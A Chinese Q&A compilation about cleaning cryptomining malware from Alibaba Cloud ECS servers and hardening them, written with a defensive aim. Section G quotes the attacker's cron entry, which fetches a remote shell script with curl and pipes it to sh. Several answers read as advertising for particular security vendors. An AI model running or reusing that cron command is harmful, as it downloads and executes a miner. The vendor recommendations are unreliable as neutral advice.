阿里云ecs挖矿木马
A. 阿里云windows服务器中了挖矿的病毒怎么清理
光删除没用的,因为没有解决好漏洞。
建议是重做系统,然后找护卫神给你做一下系统安全加固,把漏洞彻底堵住才有效果。
B. 阿里云允许用云主机挖矿吗
VPS提供商一般都不允许云主机进行挖矿,一旦发现就会被封禁,而且本来就对挖矿进行了限制,本身你就无法使用云主机进行挖矿,而且性能也达不到挖矿的标准。
C. windows服务器的挖矿进程怎么关闭删除
这种病毒腾讯安全提到过
可以去下载安装一个腾讯御点
打开之后,使用里面的病毒查杀功能,直接就可以查杀这种电脑病毒了
D. 为什么我的阿里云 ECS 数据库密码总被莫名篡改
服务器安全这问题,很重要,之前服务器被黑,管理员账号也被篡改,远程端口也
登陆不了了。,在网上搜索了一些服务器安全设置以及防黑的文章,对着文章,我
一个一个的设置起来,费了好几天的时间才设置完,原以为会防止服务器再次被黑
,没想到服务器竟然瘫痪了,网站都打不开了,无奈对服务器安全也是一窍不通,
损失真的很大,数据库都损坏了,我哪个后悔啊。娘个咪的。最后还是让机房把系
统重装了。找了几个做网站服务器方面的朋友,咨询了关于服务器被黑的解决办法
,他们建议找国内最有名的服务器安全的安全公司来给做安全维护,找了sinesafe
,服务器被黑的问题,才得以解决。
一路的走来,才知道,服务器安全问题可不能小看了。经历了才知道,服务器安全
了给自己带来的也是长远的利益。 希望我的经历能帮到楼主,帮助别人也是在帮
助我自己。
下面是一些关于安全方面的建议!
建站一段时间后总能听得到什么什么网站被挂马,什么网站被黑。好像入侵挂马似
乎是件很简单的事情。其实,入侵不简单,简单的是你的网站的必要安全措施并未
做好。
一:挂马预防措施:
1、建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。
2、定期对网站进行安全的检测,具体可以利用网上一些工具,如sinesafe网站挂
马检测工具!
序,只要可以上传文件的asp都要进行身份认证!
3、asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期
更换。
4、到正规网站下载asp程序,下载后要对其数据库名称和存放路径进行修改,数据
库文件名称也要有一定复杂性。
5、要尽量保持程序是最新版本。
6、不要在网页上加注后台管理程序登陆页面的链接。
7、为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维
护时再通过ftp上传即可。
8、要时常备份数据库等重要文件。
9、日常要多维护,并注意空间中是否有来历不明的asp文件。记住:一分汗水,换
一分安全!
10、一旦发现被入侵,除非自己能识别出所有木马文件,否则要删除所有文件。
11、对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序
。这其中包括各种新闻发布、商城及论坛程
二:挂马恢复措施:
1.修改帐号密码
不管是商业或不是,初始密码多半都是admin。因此你接到网站程序第一件事情就
是“修改帐号密码”。帐号
密码就不要在使用以前你习惯的,换点特别的。尽量将字母数字及符号一起。此外
密码最好超过15位。尚若你使用
SQL的话应该使用特别点的帐号密码,不要在使用什么什么admin之类,否则很容易
被入侵。
2.创建一个robots.txt
Robots能够有效的防范利用搜索引擎窃取信息的骇客。
3.修改后台文件
第一步:修改后台里的验证文件的名称。
第二步:修改conn.asp,防止非法下载,也可对数据库加密后在修改conn.asp。
第三步:修改ACESS数据库名称,越复杂越好,可以的话将数据所在目录的换一下
。
4.限制登陆后台IP
此方法是最有效的,每位虚拟主机用户应该都有个功能。你的IP不固定的话就麻烦
点每次改一下咯,安全第一嘛。
5.自定义404页面及自定义传送ASP错误信息
404能够让骇客批量查找你的后台一些重要文件及检查网页是否存在注入漏洞。
ASP错误嘛,可能会向不明来意者传送对方想要的信息。
6.慎重选择网站程序
注意一下网站程序是否本身存在漏洞,好坏你我心里该有把秤。
7.谨慎上传漏洞
据悉,上传漏洞往往是最简单也是最严重的,能够让黑客或骇客们轻松控制你的网
站。
可以禁止上传或着限制上传的文件类型。不懂的话可以找专业做网站安全的
sinesafe公司。
8. cookie 保护
登陆时尽量不要去访问其他站点,以防止 cookie 泄密。切记退出时要点退出在关
闭所有浏览器。
9.目录权限
请管理员设置好一些重要的目录权限,防止非正常的访问。如不要给上传目录执行
脚本权限及不要给非上传目录给于写入权。
10.自我测试
如今在网上黑客工具一箩筐,不防找一些来测试下你的网站是否OK。
11.例行维护
a.定期备份数据。最好每日备份一次,下载了备份文件后应该及时删除主机上的备
份文件。
b.定期更改数据库的名字及管理员帐密。
c.借WEB或FTP管理,查看所有目录体积,最后修改时间以及文件数,检查是文件是
否有异常,以及查看是否有异常的账号。
E. 阿里云ECS服务器对外攻击,怎么解决
服务器被黑了,保存数据,重做系统。服务器
F. 阿里云服务器ECS CPU老是被一个程序占满100%
是一个mc-serv生成的病毒文件,
风险简述 高危
安装windows自启动项
运行信息 Windows XP SP3 + PDF11
可疑行为特征
[-]安装windows自启动项(1)
[-]file
"C:\\WINDOWS\\win.ini"
进程树
.exe
文件释放
[+]libeay32.dll
[+]zlib1.dll
[+]libwinpthread-1.dll
[+]mscl.exe
[+]ssleay32.dll
[+]libcurl-4.dll
[+]__tmp_rar_sfx_access_check_35958766
行为细节
[-].exe(当前进程号:1984,父进程号:1060)(1630)
[+]系统函数调用
[+]进程函数调用
[+]注册表函数调用
[+]文件函数调用
[+]其它函数调用
G. 阿里云服务器被挖矿了怎么办(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
H. 阿里云ECS服务器CPU占用较高时,该如何处理
这种情况可以考虑是被挖矿了,可以找到云市场云顶云寻求帮助,一般这种情况会让工程师进行排查找出问题所在,然后再进行修理,大概的时间一般是三天以内
I. 阿里云ecs服务器怎么设置更安全
云服务器的安全安全设置主要有一下几个比较重要的几个方面:
1、首先是服务器的用户管理,很多的攻击和破解,首先是针对于系统的远程登录,毕竟拿到登录用户之后就能进入系统进行操作,所以首先要做的就是禁止root超级用户的远程登录。
2、把ssh的默认端口改为其他不常用的端口。你可能不知道我们的服务器其实每天都在被很多的扫描工具在扫描着,尤其是对于Linux服务器的ssh默认22端口,扫描工具扫描出22端口之后就可能会尝试破解和登录。把ssh的默认端口修改后可以减少被扫描和暴力登录的概率。此外你还可以使用fail2ban等程序防止ssh被暴力破解,其原理是尝试多少次登录失败之后就把那个IP给禁止登录了。
3、SSH 改成使用密钥登录,这样子就不必担心暴力破解了,因为对方不可能有你的密钥,比密码登录安全多了。
4、一定要定期检查和升级你的网站程序以及相关组件,及时修复那些重大的已知漏洞。网上也有很多的爬虫机器人每天在扫描着各式各样的网站,尝试找系统漏洞。即使你前面把服务器用户权限管理、登录防护都做得很好了,然而还是有可能在网站程序上被破解入侵。
5、另外如果云服务器上运行多个网站系统(博客+企业官网)。我推荐使用docker容器的方式隔离运行环境,将每个程序运行在一个单独的容器里,这样即使服务器上其中的一个网站程序被破解入侵了,也会被限制在被入侵的容器内,不会影响到其他的容器,也不会影响到系统本身。